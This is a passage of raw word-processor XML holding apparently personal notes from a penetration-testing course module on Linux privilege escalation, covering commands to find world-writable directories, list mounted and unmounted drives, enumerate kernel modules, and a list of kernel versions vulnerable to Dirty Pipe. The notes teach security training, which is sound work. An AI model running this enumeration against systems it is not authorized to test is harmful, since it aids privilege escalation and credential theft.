          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3336458" cy="4776788"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="565" name="image544.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image544.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId905"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3336458" cy="4776788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="945"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -writable -type d 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown above, several directories seem to be world-writable, including the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/joe/.scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, which is the location of the cron script we found earlier. This certainly warrants further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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AF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x40thg3zx14g" w:id="377"/>
      <w:bookmarkEnd w:id="377"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unmounted Drives Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF2">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On most systems, drives are automatically mounted at boot time. Because of this, it's easy to forget about unmounted drives that could contain valuable information. We should always look for unmounted drives, and if they exist, check the mount permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Linux-based systems, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId906">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId907">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">mount</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list all mounted filesystems. In addition, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId908">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId909">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">/etc/fstab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file lists all drives that will be mounted at boot time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4510088" cy="4761981"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="523" name="image503.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image503.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId910"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4510088" cy="4761981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/fstab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF8">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output reveals a swap partition and the primary ext4 disk of this Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep in mind that the system administrator might have used custom configurations or scripts to mount drives that are not listed in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/fstab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. Because of this, it's good practice to not only scan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/fstab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but to also gather information about mounted drives using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId911">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId912">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">lsblk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view all available disks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3767138" cy="1473047"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="314" name="image337.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image337.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId913"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3767138" cy="1473047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll notice that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sda</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> drive consists of three different numbered partitions. In some situations, showing information for all local disks on the system might reveal partitions that are not mounted. Depending on the system configuration (or misconfiguration), we then might be able to mount those partitions and search for interesting documents, credentials, or other information that could allow us to escalate our privileges or get a better foothold in the network.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B01">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_824iwobk4ycx" w:id="378"/>
      <w:bookmarkEnd w:id="378"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty pipe:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="940"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty Pipe Vulnerable: 5.8 → 5.16.10 (inclusive), 5.15 → 5.15.24, 5.10 → 5.10.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9.0 exploited in XXXXXXXXX-B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (18.1.2. Manual Enumeration) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another common privilege escalation technique involves exploitation of device drivers and kernel modules. We will explore actual exploitation tactics later in this Module, but first let's examine some important enumeration techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this technique relies on matching vulnerabilities with corresponding exploits, we'll need to gather a list of drivers and kernel modules that are loaded on the target. We can enumerate the loaded kernel modules using lsmod without any additional arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3481388" cy="2386939"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="399" name="image396.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image396.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId914"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3481388" cy="2386939"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
